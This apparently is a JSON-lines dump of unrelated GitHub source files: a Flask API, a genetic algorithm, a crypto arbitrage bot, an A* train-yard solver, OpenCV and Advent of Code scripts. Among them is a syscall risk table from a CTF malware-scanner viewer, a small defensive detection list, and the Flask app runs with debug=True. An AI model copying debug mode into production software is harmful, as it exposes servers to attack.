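executeScript/killScript above depend on launching the child in its own session so the whole process group can be signalled later; the idiom in isolation (POSIX-only, command illustrative):

import os
import signal
import subprocess

# preexec_fn=os.setsid puts the child (and anything it spawns) in a new group.
proc = subprocess.Popen("sleep 30", shell=True, preexec_fn=os.setsid)
os.killpg(os.getpgid(proc.pid), signal.SIGTERM) # terminates the whole group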
request.json['location_name']\n return jsonify(utilsDB.get_nearest_location_data_date(location_name))\n\n@app.route(\"/getRankings\", methods=['POST'])\n@limiter.limit(\"30/second\")\ndef getRankings():\n pollutant = \"\"\n if(request.method == 'POST'):\n pollutant = request.json['pollutant']\n date = request.json['date']\n return jsonify(utilsDB.get_rankings_data(pollutant, date))\n\n@app.route(\"/getUniqueLocations\")\n@limiter.limit(\"30/second\")\ndef getUniqueLocations():\n return jsonify(utilsDB.get_unique_locations())\n\n@app.route(\"/getUniqueLocationsInfoData\")\n@limiter.limit(\"30/second\")\ndef getUniqueLocationsInfoData():\n return jsonify(utilsDB.get_unique_location_info_data())\n\n@app.route(\"/getRankingDateRange\")\n@limiter.limit(\"30/second\")\ndef getDateRange():\n return jsonify(utilsDB.get_ranking_date_range())\n\n@app.route(\"/getForecastDateRange\", methods=['POST'])\n@limiter.limit(\"30/second\")\ndef getForecastDateRange():\n location = \"\"\n pollutant = \"\"\n if(request.method == 'POST'):\n location = request.json['location_name']\n pollutant = request.json['pollutant_name']\n return jsonify(utilsDB.get_forecast_date_range(location, pollutant))\n\n\n# Main\n# ---------------------------------------------------------------------\nthis_module: str = __name__\nmain_module: str = \"__main__\"\n\nif this_module == main_module:\n app.run(host=\"localhost\", port=8085, debug=True)","repo_name":"RogerPugaRuiz/DAWBIO-M12-PROJECT","sub_path":"backend-map/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40728126049","text":"import random\r\n\r\nlista_rizou = [0, 2, 4, 6, 14, 20, 28, 30, 32, 34, 42, 56, 70] #Λίστα με τα index των μαύρων boxes\r\n'''\r\n#_#_#_#\r\n_______\r\n#_____#\r\n_______\r\n#_#_#_#\r\n_______\r\n#______\r\n_______\r\n#______\r\n_______\r\n#______\r\n'''\r\nlista_Karabos = [0, 12, 14, 24, 28, 36, 42, 52, 56, 68, 70]\r\n'''\r\n#______\r\n_____#_\r\n#______\r\n___#___\r\n#______\r\n_#_____\r\n#______\r\n___#___\r\n#______\r\n_____#_\r\n#______\r\n'''\r\nx = input(str('Choose between Rizos and Karampoikis.\\n Type R to check Rizos or K to check Karampoikis: ')) #Επιλογή γράμματος παίρνει μονο τα Κ και Ρ, ανεξαρτήτως αν είναι κεφαλαία ή μικρά.\r\nwhile(x.upper() != 'R' and x.upper() != 'K'):\r\n print(x)\r\n x = input(str('Choose between Rizos and Karampoikis.\\n Type R to check Rizos or K to check Karampoikis:'))\r\nif x.upper() == 'R':\r\n END_GRID = lista_rizou\r\n percent = 10/14\r\nelse:\r\n END_GRID = lista_Karabos\r\n percent = 10/12\r\n\r\nSTARTING_POOL = 100\r\n\r\n\r\n#evaluation function\r\ndef eval_fun(rg, g): #Καλείται για να αποδόση βαθμολογία σε κάθε grid, επί της ουσίας συγκρίνει να δεί αν τα indexes βρίσκονται στις σωστές θέσει\r\n tmp_rg = rg.copy()\r\n result = 1\r\n for i in g:\r\n if i in tmp_rg:\r\n result += 1\r\n tmp_rg.remove(i)\r\n\r\n return result/(len(rg) +1 )\r\n\r\n#Explanatory function Καλείται όταν βρεθεί καλή λύση και εκτυπώνει πράγματα για το grid που βρήκε\r\ndef the_end(rg,g):\r\n tmp_rg = rg.copy()\r\n result = 1\r\n for i in g:\r\n if i in tmp_rg:\r\n result += 1\r\n tmp_rg.remove(i)\r\n print('Result is:',result,', at ', len(rg) +1)\r\n\r\n#Gnerate grid function Καλείται για να δημιουργήσει grid. 
Αυτό επιτυγχάνεται καλώντας 12 ή 14 ανάλογα με το END GRID εντελώς τυχαία νούμερα που θα είναι μεταξύ τους διαφορετικά\r\ndef generate_grid():\r\n grid = list()\r\n list_of_nums = list()\r\n for i in range(len(END_GRID)):\r\n num = random.randint(0,76)\r\n while(num in list_of_nums):\r\n num = random.randint(0,76)\r\n list_of_nums.append(num)\r\n grid.append(num)\r\n grid.sort()\r\n return grid\r\n\r\n#geneating random genetic pool Καλείται για να δημιουργήσει τον αρχικό μας πληθυσμό. Κάθε Pool έχει 100 (STARTING POOL) grid\r\n# και έναν αριθμό που αργότερα θα αναπαριστά το eval_func\r\ndef generate_pool(pool_size):\r\n pool = []\r\n for g in range(0, pool_size):\r\n grid = generate_grid()\r\n pool.append([grid, 0])\r\n return pool\r\n\r\n\r\n\r\n#generates the roulette for each stage Επίσης κάνει σόρτ και ύστερα στο pool αλλάζει το eval func με το ποσοστό των επιτυχώμενων καταστάσεων του grid ανά την βαθμολογία των συνολικών grids\r\ndef roulette_generator(rg ,pool):\r\n sum = 0\r\n for elem in pool:\r\n elem[1] = eval_fun(rg ,elem[0])\r\n if(elem[1]!=0):\r\n sum += elem[1]\r\n\r\n for elem in pool:\r\n if elem[1]!=0:\r\n elem[1] /= sum\r\n\r\n pool.sort(key = lambda elem: elem[1], reverse = True)\r\n total = 0\r\n tmp = 0\r\n for elem in pool:\r\n tmp = elem[1]\r\n elem[1] = elem[1] + total\r\n total += tmp\r\n\r\n\r\n#Choose Parents Function Επιλέγει γονείς και τους βγάζει από το pool\r\ndef chooseParents(rg, pool): \r\n pair = [0, 0]\r\n for i in range(0, 2):\r\n roulette_generator(rg, pool)\r\n #choose parent i\r\n point = random.uniform(0, 1)\r\n for elem in pool:\r\n if( point <= elem[1]):\r\n pair[i] = elem\r\n pool.remove(elem)\r\n break\r\n return pair\r\n\r\n\r\n#Mating Parents Function Κάνει Crossovers τους γονείς και δημιουργεί δύο παιδιά\r\ndef mateParents(pair):\r\n children = [pair[0], pair[1]]\r\n point = random.randint(1,11)\r\n for i in range(point, len(END_GRID)):\r\n children[0][0][i] = pair[1][0][i]\r\n children[1][0][i] = pair[0][0][i]\r\n children[0][0].sort()\r\n children[1][0].sort()\r\n return children\r\n\r\n#Nice Print Function Εκτυπώνει με ωραίο τρόπο την λίστα μας\r\ndef nice_print(grid):\r\n print('-'*50)\r\n s = ''\r\n for i in range(1, 78):\r\n if i-1 in grid[0]:\r\n s+='#'\r\n else: \r\n s+='_'\r\n if i%7 ==0:\r\n print(s)\r\n s = ''\r\n print(grid[0])\r\n\r\n\r\n#isDone Function Ελέγχει αν βρέθηκε αρκετά καλή λύση\r\ndef isDone(rg,g):\r\n e = eval_fun(END_GRID, pool[0][0])\r\n if( e >= percent ):\r\n print('Current best')\r\n nice_print(pool[0])\r\n the_end(END_GRID,pool[0][0])\r\n return True\r\n return False\r\n\r\n\r\n#STARTING PROGRAMM\r\nrandom.seed(a = None, version = 2) #Επιλέγω εντελώς τυχαίο seed\r\npool = generate_pool(STARTING_POOL) #Φτιάχνω τον αρχαίο πληθυσμό\r\ni = 0\r\nto_change = int(STARTING_POOL / 5) #Μεταβλητή όπου θα αλλάζει τα to_change χειρότερα grids με καινούριο τυχαία \r\nwhile(True):\r\n tmp = []\r\n roulette_generator(END_GRID, pool)\r\n if(isDone(END_GRID, pool[0][0])):\r\n break\r\n for j in range(0, int(STARTING_POOL/2)):\r\n pair = chooseParents(END_GRID, pool)\r\n children = mateParents(pair)\r\n tmp.append(children[0])\r\n tmp.append(children[1])\r\n pool = tmp.copy()\r\n roulette_generator(END_GRID, pool)\r\n if(isDone(END_GRID, pool[0][0])):\r\n break\r\n if(i % 10 == 0): #Κάθε 10 φορές θα χρησιμοποιεί την to change να αλλάξει τα to change χειρότερα δείγματα\r\n for j in range(0, to_change):\r\n g = generate_grid()\r\n pool[STARTING_POOL -j -1][0] = g.copy()\r\n if(isDone(END_GRID, pool[0][0])):\r\n break\r\n i += 
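mateParents above swaps the two parents' tails at a random cut point and re-sorts each child; a distilled single-point crossover with a fixed cut for reproducibility:

def crossover(parent_a, parent_b, point):
    # Exchange everything from `point` onward, then sort, as mateParents does.
    child_a = sorted(parent_a[:point] + parent_b[point:])
    child_b = sorted(parent_b[:point] + parent_a[point:])
    return child_a, child_b

print(crossover([1, 4, 9, 12], [2, 5, 7, 20], 2))
# -> ([1, 4, 7, 20], [2, 5, 9, 12])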
1\r\n\r\n","repo_name":"SokianTerror/Genetic-Algortithm","sub_path":"wanga.py","file_name":"wanga.py","file_ext":"py","file_size_in_byte":6406,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2599538876","text":"import json \nimport requests\nfrom web3 import Web3, EthereumTesterProvider\nfrom dotenv import load_dotenv\nimport os\nfrom brownie import *\nfrom .abi import oneInchV4, zeroX\n\nload_dotenv()\n\noneInchv4 = oneInchV4()\nzerox = zeroX()\n\nw3 = Web3(Web3.HTTPProvider( os.getenv('RPC')))\n\nbaseAssetAddress = os.getenv('baseAssetAddress')\nquoteAssetAddress = os.getenv('quoteAssetAddress')\n\ndef main():\n try:\n base = baseAssetAddress[2:]\n quote = quoteAssetAddress[2:]\n res = requests.get(f'https://api.0x.org/sra/v3/orderbook?baseAssetData=0xf47261b0000000000000000000000000{base}"eAssetData=0xf47261b0000000000000000000000000{quote}&perPage=1000')\n _0x_txs = res.json()['bids']['records'] \n arb_results = map(checkArb, _0x_txs)\n arb_results = list(arb_results)\n #print(arb_results)\n except Exception as e:\n print(f\"error:{e}\")\n\ndef checkArb(r):\n zrxOrder, metadata = (r['order'], r['metaData'])\n inputAssetAmount = zrxOrder['takerAssetAmount']\n out2 = Web3.fromWei(int(zrxOrder['makerAssetAmount']), 'ether')\n amount = zrxOrder['makerAssetAmount']\n oneInchOrder = requests.get(f'https://api.1inch.exchange/v4.0/1/quote?fromTokenAddress={quoteAssetAddress}&toTokenAddress={baseAssetAddress}&amount={amount}').json()\n outputAssetAmount = oneInchOrder['toTokenAmount']\n netProfit = Web3.fromWei(int(outputAssetAmount), 'ether') - Web3.fromWei(int(inputAssetAmount), 'ether') \n if netProfit > 0.1:\n print(netProfit)\n print(out2)\n print(Web3.fromWei(int(outputAssetAmount), 'ether'))\n print(Web3.fromWei(int(inputAssetAmount), 'ether'))\n trade(zrxOrder, oneInchOrder)\n\ndef trade(zrxOrder, oneInchOrder):\n acc = accounts.at(os.getenv(\"myAccount\"), force=True)\n #swap_proxy = SwapProxy[len(SwapProxy) - 1]\n #print(swap_proxy)\n print(zrxOrder)\n print(\"================\")\n print(oneInchOrder)\n\n# ----------------------------------------------------- # \n# DONT FORGET FLASHBOTS ;) HAHAH // NO FRONT RUN PLEASE\n# ----------------------------------------------------- #","repo_name":"WillSchiller/brownie-arb-bot","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74663845227","text":"import numbers\nimport enum\nfrom typing import List, Tuple\n\n\nclass SyscallClass(enum.Enum):\n Ignore = 0\n Low = 1\n Medium = 2\n High = 3\n\n def __gt__(self, other):\n if isinstance(other, numbers.Real):\n return self.value > other\n return self.value > other.value\n\n def __lt__(self, other):\n if isinstance(other, numbers.Real):\n return self.value < other\n return self.value < other.value\n\n\n# Class, name, syscall number, arg count\nsyscalls = [\n [SyscallClass.Low, \"read\", 0, 3],\n [SyscallClass.Low, \"write\", 1, 3],\n [SyscallClass.Medium, \"open\", 2, 3],\n [SyscallClass.Low, \"close\", 3, 1],\n [SyscallClass.Medium, \"stat\", 4, 2],\n [SyscallClass.Medium, \"fstat\", 5, 2],\n [SyscallClass.Medium, \"lstat\", 6, 2],\n [SyscallClass.Medium, \"access\", 21, 2],\n [SyscallClass.Low, \"alarm\", 37, 1],\n [SyscallClass.High, \"socket\", 41, 3],\n [SyscallClass.High, \"connect\", 42, 3],\n [SyscallClass.High, \"accept\", 43, 3],\n [SyscallClass.High, \"shutdown\", 48, 2],\n 
[SyscallClass.High, \"bind\", 49, 3],\n [SyscallClass.High, \"listen\", 50, 2],\n [SyscallClass.Medium, \"clone\", 56, 5],\n [SyscallClass.Medium, \"fork\", 57, 0],\n [SyscallClass.Medium, \"vfork\", 58, 0],\n [SyscallClass.High, \"execve\", 59, 3],\n [SyscallClass.High, \"kill\", 62, 2],\n [SyscallClass.Medium, \"uname\", 63, 1],\n [SyscallClass.Medium, \"getdents\", 78, 3],\n [SyscallClass.Medium, \"getcwd\", 79, 2],\n [SyscallClass.Medium, \"chdir\", 80, 1],\n [SyscallClass.Medium, \"fchdir\", 81, 1],\n [SyscallClass.High, \"rename\", 82, 2],\n [SyscallClass.Low, \"mkdir\", 83, 2],\n [SyscallClass.High, \"rmdir\", 84, 1],\n [SyscallClass.High, \"unlink\", 87, 1],\n [SyscallClass.Medium, \"chmod\", 90, 2],\n [SyscallClass.Medium, \"fchmod\", 91, 2],\n [SyscallClass.High, \"chown\", 92, 3],\n [SyscallClass.High, \"fchown\", 93, 3],\n [SyscallClass.High, \"ptrace\", 101, 4],\n]\n\ntemplate = \"\"\"
\n

{}({}) = {}\n

\n\"\"\"\n\n\nclass LoggedSyscall:\n sys_num: int\n rdi: int\n rsi: int\n rdx: int\n r10: int\n r8: int\n r9: int\n ret: int\n\n def __init__(self, values):\n self.sys_num, self.rdi, self.rsi, self.rdx, \\\n self.r10, self.r8, self.r9, self.ret = values\n\n def get_args(self, count) -> List[int]:\n if count == 0:\n return []\n if count == 1:\n return [self.rdi]\n if count == 2:\n return [self.rdi, self.rsi]\n if count == 3:\n return [self.rdi, self.rsi, self.rdx]\n if count == 4:\n return [self.rdi, self.rsi, self.rdx, self.r10]\n if count == 5:\n return [self.rdi, self.rsi, self.rdx, self.r10, self.r8]\n if count == 6:\n return [self.rdi, self.rsi, self.rdx, self.r10, self.r8, self.r9]\n\n def render(self) -> Tuple[SyscallClass, str]:\n status = \"light\"\n for sys_entry in syscalls:\n if sys_entry[2] == self.sys_num:\n if sys_entry[0] == SyscallClass.Low:\n status = \"success\"\n elif sys_entry[0] == SyscallClass.Medium:\n status = \"warning\"\n elif sys_entry[0] == SyscallClass.High:\n status = \"danger\"\n rendered = template.format(status, f\"{sys_entry[1]}\", \", \".join([\n hex(x) for x in self.get_args(sys_entry[3])\n ]), hex(self.ret))\n return sys_entry[0], rendered\n rendered = template.format(status, f\"sys_{self.sys_num}\", \"\", hex(self.ret))\n return SyscallClass.Ignore, rendered\n","repo_name":"dkb4rb/HackTheBox_pwned","sub_path":"CTFS/scanned/content/malscanner/viewer/syscalls.py","file_name":"syscalls.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8397344391","text":"from ...error import GraphQLError\nfrom ...type.definition import get_named_type, is_leaf_type\nfrom .base import ValidationRule\n\n\nclass ScalarLeafs(ValidationRule):\n\n def enter_Field(self, node, key, parent, path, ancestors):\n type = self.context.get_type()\n\n if not type:\n return\n\n if is_leaf_type(get_named_type(type)):\n if node.selection_set:\n self.context.report_error(GraphQLError(\n self.no_subselection_allowed_message(node.name.value, type),\n [node.selection_set]\n ))\n\n elif not node.selection_set:\n self.context.report_error(GraphQLError(\n self.required_subselection_message(node.name.value, type),\n [node]\n ))\n\n @staticmethod\n def no_subselection_allowed_message(field, type):\n return 'Field \"{}\" of type \"{}\" must not have a sub selection.'.format(field, type)\n\n @staticmethod\n def required_subselection_message(field, type):\n return 'Field \"{}\" of type \"{}\" must have a sub selection.'.format(field, type)\n","repo_name":"wandb/wandb","sub_path":"wandb/vendor/graphql-core-1.1/wandb_graphql/validation/rules/scalar_leafs.py","file_name":"scalar_leafs.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"26643388335","text":"\"\"\" Text Form Display\n\n\"\"\"\nimport sys\n\n\nclass GraphLister(object):\n def __init__(self, iterable):\n self.lst = list(iterable)\n\n def grep(self, f):\n if isinstance(f, str):\n return GraphLister([x for x in self.lst if f in str(x)])\n else:\n return GraphLister([x for x in self.lst if f(x)])\n\n def map_(self, f, *args, **kwargs):\n for e in self.lst:\n f(e, *args, **kwargs)\n\n def print_graphs(self):\n global print_graph\n self.map_(print_graph)\n\n def __repr__(self):\n result = []\n for i,e in enumerate(self.lst):\n result.append(\"%4d %s\\n\"%(i,str(e)))\n return \"\".join(result)\n\nclass RichTranslation(object):\n def 
__init__(self, t):\n        self.t = t\n\n    def graphs(self, f = None):\n        gs = GraphLister(self.t.context.graphs)\n        if f != None:\n            gs = gs.grep(f)\n        return gs\n\ndef list_entries(lst):\n    i = 0\n    for e in lst:\n        print(\"%4d %s\" % (i, e))\n        i += 1\n\n\ndef print_block(b, map_bi=None, w_obj=sys.stdout):\n    w_obj.write(\"blk_%d\\n\" % (map_bi[b] if map_bi else -1))\n    w_obj.write(\"input: [%s]\\n\" % (\", \".join([str(arg) for arg in b.inputargs])))\n\n    w_obj.write(\"operations:\\n\")\n    for op in b.operations:\n        w_obj.write(\"  %s\\n\" % op)\n\n    if b.exitswitch:\n        w_obj.write(\"switch: %s\\n\" % b.exitswitch)\n\n    w_obj.write(\"exits: [%s]\\n\" % (\", \".join(\n        [str((\"blk_%d\" % (map_bi[lnk.target] if map_bi else -1), lnk.args)) for lnk in b.exits])))\n\n\ndef print_graph_with_name(graphs, name):\n    for g in graphs:\n        if str(g) == name:\n            print_graph(g)\n\n\ndef build_block_index_map(g):\n    idx = 0\n    map_blk_idx = {}\n\n    for b in g.iterblocks():\n        map_blk_idx[b] = idx\n        idx += 1\n    return map_blk_idx\n\n\ndef print_graph(g, w_obj=sys.stdout):\n    w_obj.write('================================================\\n')\n    w_obj.write(str(g)+'\\n')\n\n    map_bi = build_block_index_map(g)\n\n    for b in g.iterblocks():\n        w_obj.write('------------------------\\n')\n        print_block(b, map_bi, w_obj)\n    w_obj.write('================================================\\n')\n    w_obj.write('\\n')\n","repo_name":"wdv4758h/mu-client-pypy","sub_path":"rpython/mutyper/tools/textgraph.py","file_name":"textgraph.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5170624672","text":"import cv2\nimport math\nimport numpy as np\n\nfile_src = 'src_depth_ball.png'\nfile_dst = 'dst.png'\n\nimg_src = cv2.imread(file_src, 0)\n\ncv2.namedWindow('src')\ncv2.namedWindow('dst')\n\ndepth_min = 206\ndepth_max = 210\nimg_dst = cv2.inRange(img_src, depth_min, depth_max)\n\nkernel = np.ones((3, 3), np.uint8)\nimg_dst = cv2.erode(img_dst, kernel, iterations=2)\nimg_dst = cv2.dilate(img_dst, kernel, iterations=2)\n\nnlabel, img_lab = cv2.connectedComponents(img_dst)\nfor i in range(1, nlabel, 1):\n    img_dst = cv2.compare(img_lab, i, cv2.CMP_EQ)\n    print(i, ' / ', (nlabel - 1))\n    cv2.imwrite('dst' + str(i) + '.png', img_dst)\n    cv2.imshow('src', img_src)\n    cv2.imshow('dst', img_dst)\n    cv2.waitKey(0)\n\ncv2.destroyAllWindows()\n","repo_name":"mkoeda/opencvbook","sub_path":"OpenCVによる画像処理入門/第3版/第1刷/sampleprogram/11-3-9.py","file_name":"11-3-9.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35621026705","text":"from Yard import Yard\nfrom States import States\nimport copy\nimport time\n\n\nclass Switch:\n\n    def __init__(self, _yard, _start, _end):\n\n        if len(_start.state) != len(_end.state):\n            raise Exception(\"Start State and Goal State Have Different Track Number\")\n\n        if len(_start.state) != _yard.num_tracks:\n            raise Exception(\"Start State and Yard Have Different Track Number\")\n\n        end_track_position = -1\n\n        for i in range(len(_end.state)):\n            if \"*\" in _end.state[i]:\n                end_track_position = i + 1\n                break\n\n        if end_track_position == -1:\n            raise Exception(\"Engine Not Found in End State\")\n\n        visited = []\n        distance = {}\n        q = [end_track_position]\n        count = 0\n\n        while q:\n            _q = []\n            for i in range(len(q)):\n                if q[i] in visited:\n                    continue\n\n                for left, right in _yard.connection:\n                    if left == q[i]:\n                        _q.append(right)\n                    if right == q[i]:\n                        _q.append(left)\n\n                visited.append(q[i])\n                distance[q[i]] = count\n            q = _q\n            
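The breadth-first sweep in Switch.__init__ above labels every track with its hop distance from the engine's goal track; a compact standalone equivalent using the same yard connectivity:

from collections import deque

def track_distances(connections, goal):
    adj = {}
    for a, b in connections:
        adj.setdefault(a, []).append(b)
        adj.setdefault(b, []).append(a)
    dist, frontier = {goal: 0}, deque([goal])
    while frontier: # plain BFS over the undirected track graph
        t = frontier.popleft()
        for n in adj.get(t, []):
            if n not in dist:
                dist[n] = dist[t] + 1
                frontier.append(n)
    return dist

print(track_distances([(1, 2), (1, 3), (3, 5), (4, 5), (2, 6), (5, 6)], 1))
# -> {1: 0, 2: 1, 3: 1, 6: 2, 5: 2, 4: 3}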
count += 1\n\n self.yard = _yard\n self.start = _start\n self.end = _end\n self.end_track_position = end_track_position\n self.distance = distance\n self.found = False\n self.path = None\n\n # Write a function possible-actions that consumes a Yard (connectivity list) and a State, and\n # produces a list of all actions possible in the given train yard from the given state\n def possible_actions(self, current_state):\n engine_position = current_state.find_engine_state()\n\n if engine_position == -1:\n raise Exception(\"Engine Not Found\")\n\n result = []\n\n for left, right in self.yard.connection:\n\n if left == right:\n raise Exception(\"Track Connection Input Error\")\n\n if left == engine_position:\n result.append(\"right \" + str(engine_position) + \" \" + str(right))\n if len(current_state.state[right - 1]) != 0:\n result.append(\"left \" + str(right) + \" \" + str(engine_position))\n\n if right == engine_position:\n result.append(\"left \" + str(engine_position) + \" \" + str(left))\n if len(current_state.state[left - 1]) != 0:\n result.append(\"right \" + str(left) + \" \" + str(engine_position))\n\n return result\n\n # Consumes an Action and a State and produces the new State that\n # will result after actually carrying out the input move in the input state.\n def result(self, action, current_state):\n new_state = copy.deepcopy(current_state)\n action_args = action.split(' ')\n\n if len(action_args) != 3:\n raise Exception(\"Action Args Usage: 'string:Direction(left, right) int:source_track int:target_track'\")\n\n if action_args[0] not in ['left', 'right']:\n raise Exception(\"Invalid State Moving Direction \" + action_args[0])\n\n direction, source, target = action_args[0], int(action_args[1]), int(action_args[2])\n\n if source is None or target is None:\n raise Exception(\"Invalid Source or Target Position\")\n\n connected_track = False\n\n for left, right in self.yard.connection:\n if direction == 'left' and left == target and right == source:\n new_state.move(direction, source, target)\n connected_track = True\n break\n elif direction == 'right' and left == source and right == target:\n new_state.move(direction, source, target)\n connected_track = True\n break\n\n if not connected_track:\n raise Exception(\"Source and Target are NOT Connected\")\n\n return new_state\n\n # Consumes a State and produces a list of all states that\n # can be reached in one Action from the given state.\n def expand(self, current_state):\n result = []\n possible_actions = self.possible_actions(current_state)\n\n for action in possible_actions:\n result.append(self.result(action, current_state))\n\n return result\n\n # Produces a list of Actions that will take the cars in the initial state into the goal state.\n # Use a blind (uninformed) search method. This is a NP Problem. For optimality I use an array\n # to record a set of visited state. Return none if goal state can't be reach.\n def blind_search(self):\n if self.start == self.end:\n return self.start\n\n visited = [self.start]\n q = self.expand(self.start)\n\n while q:\n _q = []\n for path in q:\n if path in visited:\n continue\n\n if path == self.end:\n return path\n\n _q += self.expand(path)\n visited.append(path)\n\n q = _q\n\n return None\n\n # The First Heuristic. 
Calculate How Many Total Distance of Each Car From End State\n def calculate_heuristic(self, current_state):\n result = 0\n\n for i in range(len(current_state.state)):\n if i + 1 == self.end_track_position:\n for j in range(1, len(current_state.state[i])):\n if ord(current_state.state[i][j]) - ord(current_state.state[i][j - 1]) != 1:\n result += 1\n else:\n result += self.distance[i + 1] * len(current_state.state[i])\n\n return result\n\n def dfs(self, path, cost, visited):\n if self.found:\n return\n\n if len(path) == visited[-1].cost and path[-1] == visited[-1]:\n self.found = True\n self.path = path[:]\n\n for v in filter(lambda x: x.cost == cost, visited):\n for _p in self.expand(v):\n if _p in visited:\n path.append(_p)\n self.dfs(path, cost + 1, visited)\n path.pop()\n\n # Search with Heuristic\n def a_star(self):\n if self.start == self.end:\n return self.start\n\n visited = [self.start]\n q = self.expand(self.start)\n\n while q:\n q.sort(key=lambda x: x.cost + self.calculate_heuristic(x), reverse=True)\n path = q.pop()\n while path in visited:\n path = q.pop()\n if path == self.end:\n visited.append(path)\n break\n q += self.expand(path)\n visited.append(path)\n\n self.dfs([], 0, visited)\n\n\nprint(\"Processing Test Data\")\n\n########################################################################\n# #\n# Test Data #\n# #\n########################################################################\nyard = Yard([(1, 2), (1, 3), (3, 5), (4, 5), (2, 6), (5, 6)])\nstart = States([['*'], ['e'], [], ['b', 'c', 'a'], [], ['d']])\nend = States([['*', 'a', 'b', 'c', 'd', 'e'], [], [], [], [], []])\nswitch = Switch(yard, start, end)\n\nyard2 = Yard([(1, 5), (1, 2), (2, 3), (2, 4)])\nstart2 = States([['*'], ['d'], ['b'], ['a', 'e'], ['c']])\nend2 = States([['*', 'a', 'b', 'c', 'd', 'e'], [], [], [], []])\nswitch2 = Switch(yard2, start2, end2)\n\nyard3 = Yard([(1, 2), (1, 3)])\nstart3 = States([['*'], ['a'], ['b']])\nend3 = States([['*', 'a', 'b'], [], []])\nswitch3 = Switch(yard3, start3, end3)\n\nyard4 = Yard([(1, 2), (1, 3), (1, 4)])\nstart4 = States([['*'], ['a'], ['b', 'c'], ['d']])\nend4 = States([['*', 'a', 'b', 'c', 'd'], [], [], []])\nswitch4 = Switch(yard4, start4, end4)\n\nyard5 = Yard([(1, 2), (1, 3), (1, 4)])\nstart5 = States([['*'], ['a'], ['c', 'b'], ['d']]) # Note c and b out of order\nend5 = States([['*', 'a', 'b', 'c', 'd'], [], [], []])\nswitch5 = Switch(yard5, start5, end5)\n\nprint(\"Start Testing\")\nstart_time = time.time()\n\n########################################################################\n# #\n# Test Possible Path #\n# #\n########################################################################\n# print(switch.possible_actions(start))\n# print(switch2.possible_actions(start2))\n# print(switch3.possible_actions(start3))\n# print(switch4.possible_actions(start4))\n# print(switch5.possible_actions(start5))\n\n\n########################################################################\n# #\n# Test Move Track #\n# #\n########################################################################\n# print(start)\n# print(switch.result(\"left 2 1\", start))\n# print(switch.result(\"right 1 2\", start))\n\n\n########################################################################\n# #\n# Test Possible Track #\n# #\n########################################################################\n# print(start)\n# for state in switch.expand(start):\n# print(\"Possible Tracks for Start: \" + str(state))\n# print(start2)\n# for state in switch2.expand(start2):\n# print(\"Possible Tracks 
for Start2 in First Expansion: \" + str(state))\n# for next_state in switch2.expand(state):\n# print(\"Possible Tracks for Start2 in Second Expansion: \" + str(next_state))\n\n\n########################################################################\n# #\n# Test Blind(Uninformed) Search #\n# #\n########################################################################\n# print(switch3.blind_search())\n# print(switch4.blind_search())\n# print(switch5.blind_search())\n\n\n########################################################################\n# #\n# Test Heuristic #\n# #\n########################################################################\n# print(start, \". Heuristic value: \", switch.calculate_heuristic(start))\n# print(start2, \". Heuristic value: \", switch2.calculate_heuristic(start2))\n# print(start3, \". Heuristic value: \", switch3.calculate_heuristic(start3))\n# print(start4, \". Heuristic value: \", switch4.calculate_heuristic(start4))\n# print(start5, \". Heuristic value: \", switch5.calculate_heuristic(start5))\n\n\n########################################################################\n# #\n# Test A* Search #\n# #\n########################################################################\n# print(\"Switch 1: The First Possible Way\")\n# switch.a_star()\n# for p in switch.path:\n# print(p)\n# print(\"Switch 2: The First Possible Way\")\n# switch2.a_star()\n# for p in switch2.path:\n# print(p)\n# print(\"Switch 3: The First Possible Way\")\n# switch3.a_star()\n# for p in switch3.path:\n# print(p)\n# print(\"Switch 4: The First Possible Way\")\n# switch4.a_star()\n# for p in switch4.path:\n# print(p)\n# print(\"Switch 5: The First Possible Way\")\n# switch5.a_star()\n# for p in switch5.path:\n# print(p)\n\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\n########################################################################\n# #\n# A* Result #\n# #\n########################################################################\n# print(switch.a_star())\n\n# print(switch2.a_star())\n# Current State Are [['*', 'a', 'b', 'c', 'd', 'e'], [], [], [], []] with Cost 16\n# --- 95.16633439064026 seconds ---\n\n\n","repo_name":"udcymen/Train-Switch","sub_path":"Switch.py","file_name":"Switch.py","file_ext":"py","file_size_in_byte":12507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7774577018","text":"from aoc_python.utils import load_stripped_lines\n\n\ndef game_outcome(opponent: str, me: str) -> str:\n if (\n (opponent == \"A\" and me == \"X\")\n or (opponent == \"B\" and me == \"Y\")\n or (opponent == \"C\" and me == \"Z\")\n ):\n return \"draw\"\n\n if (\n (opponent == \"A\" and me == \"Y\")\n or (opponent == \"B\" and me == \"Z\")\n or (opponent == \"C\" and me == \"X\")\n ):\n return \"win\"\n return \"loss\"\n\n\ndef get_my_strat(opponent: str, end: str) -> str:\n if opponent == \"A\" and end == \"X\": # rock\n return \"Z\"\n if opponent == \"A\" and end == \"Y\":\n return \"X\"\n if opponent == \"A\" and end == \"Z\":\n return \"Y\"\n if opponent == \"B\" and end == \"X\": # paper\n return \"X\"\n if opponent == \"B\" and end == \"Y\":\n return \"Y\"\n if opponent == \"B\" and end == \"Z\":\n return \"Z\"\n if opponent == \"C\" and end == \"X\": # scissors\n return \"Y\"\n if opponent == \"C\" and end == \"Y\":\n return \"Z\"\n if opponent == \"C\" and end == \"Z\":\n return \"X\"\n\n\ndef score_game(game: str) -> int:\n opponent, end = game.split(\" \")\n me = get_my_strat(opponent, end)\n\n 
